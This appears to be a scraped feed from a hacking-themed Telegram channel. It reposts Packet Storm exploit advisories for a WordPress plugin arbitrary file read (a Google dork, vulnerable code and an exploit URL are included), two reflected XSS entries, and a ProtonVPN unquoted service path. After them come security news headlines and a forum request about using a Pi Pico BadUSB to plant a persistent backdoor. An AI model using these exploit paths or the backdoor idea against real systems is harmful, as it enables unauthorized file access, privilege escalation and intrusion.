Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read

https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
WordPress Amministrazione Aperta plugin version 3.7.3 suffers from an arbitrary file read vulnerability.

MD5 | 8dd07978b438f1e9484ef164f2dc5d93

Download
# Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated
# Google Dork: inurl:/wp-content/plugins/amministrazione-aperta/
# Date: 23-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/amministrazione-aperta/
# Version: 3.7.3
# Tested on: Firefox

# Vulnerable File: dispatcher.php

# Vulnerable Code:

```
if ( isset($_GET['open']) ) {
include(ABSPATH . 'wp-content/plugins/'.$_GET['open']);
} else {
echo '
style="padding-bottom: 20px;">

';

include_once( ABSPATH . WPINC . '/feed.php' );
```

# Proof of Concept:

localhost/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=[LFI]


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Contact Form 7 5.5.6 Cross Site Scripting

https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
WordPress Contact Form 7 plugin version 5.5.6 suffers from a cross site scripting vulnerability.

MD5 | 0b89a8f9aa88bf8e0fe15aafb9765d40

Download
# Exploit Title: WordPress Plugin Contact Form 7 v5.5.6 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/contact-form-7
# Version: 5.5.6
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Contact Form 7 from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/contact-form-7/admin/admin.php?page=

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Akismet Spam Protection 4.2.2 Cross Site Scripting

https://1.bp.blogspot.com/-PwD2Dirg2NY/WWlu3CzGC6I/AAAAAAAAIIs/x87GenQxU4E4sY7pWpFvaHW3XEOYBksJQCLcBGAs/s1600/h10.png
WordPress Akismet Spam Protection plugin version 4.2.2 suffers from a cross site scripting vulnerability.

MD5 | 0f9b4eb385a11f168f0141c337e5913b

Download
# Exploit Title: WordPress Plugin Akismet Spam Protection v4.2.2 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/akismet
# Version: 4.2.2
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Akismet Spam Protection from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/akismet/akismet.php?id=

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ProtonVPN 1.26.0 Unquoted Service Path

https://4.bp.blogspot.com/-xWCWgAV3Ny0/WWlvBhL9TTI/AAAAAAAAIKY/j6Iuv-WtlEAbM80hi5qIKa1OI4pChiwSgCLcBGAs/s1600/h124.png
ProtonVPN version 1.26.0 suffers from an unquoted service path vulnerability.

MD5 | c12107cb30eb62adf4de5b85415d6148

Download
# Exploit Title: ProtonVPN 1.26.0 - Unquoted Service Path
# Date: 22/03/2022
# Exploit Author: gemreda (@gemredax)
# Vendor Homepage: https://protonvpn.com/
# Software Link: https://protonvpn.com/
# Version: 1.26.0
# Tested: Windows 10 x64
# Contact: gemredax@pm.me

PS C:\Users\Emre> sc.exe qc "ProtonVPN Wireguard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ProtonVPN Wireguard
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.WireGuardService.exe C:\ProgramData\ProtonVPN\WireGuard\ProtonVPN.conf
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ProtonVPN WireGuard
DEPENDENCIES : Nsi
: TcpIp
SERVICE_START_NAME : LocalSystem
#Exploit:

The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.
If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as "C:\Program.exe" to be run by a privileged program making use of WinExec.


Source:packetstormsecurity.com
Dark Reading: Attacks/Breaches
Cyber Insurance and War Exclusions

Here's what a cybersecurity lawyer thinks security pros need to know in light of Russia's invasion of Ukraine.
Dark Reading: Attacks/Breaches
Could Gaming Close the Cyberskills Gap?

The Wicked6 hackathon helps women to develop their professional cybersecurity skills while networking and playing games.
Dark Reading: Attacks/Breaches
Okta Says 366 Customers Impacted via Third-Party Breach

Microsoft meanwhile confirms Lapsus$ group compromised it as well and issues warning on threat actor.
Dark Reading: Attacks/Breaches
FBI: Cybercrime Victims Suffered Losses of Over $6.9B in 2021

The Internet Crime Complaint Center fielded 847,376 cybercrime reports last year, an increase of 7% from 2020.
hacking: security in practice
Raspberry Pi Pico as a BadUSB with built in executable storage

Has anyone ever tried using the pi pico as a mass storage device while being an HID device? It would help with running really long scripts fully offline. This could help a lot with for example placing a persistant backdoor with full system access rather than downloading the files on the spot, making our jobs a lot easier.

If you have links to any articles/suggestions on how I coudl figure this out, please comment.

submitted by /u/leavewhileyoucan
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video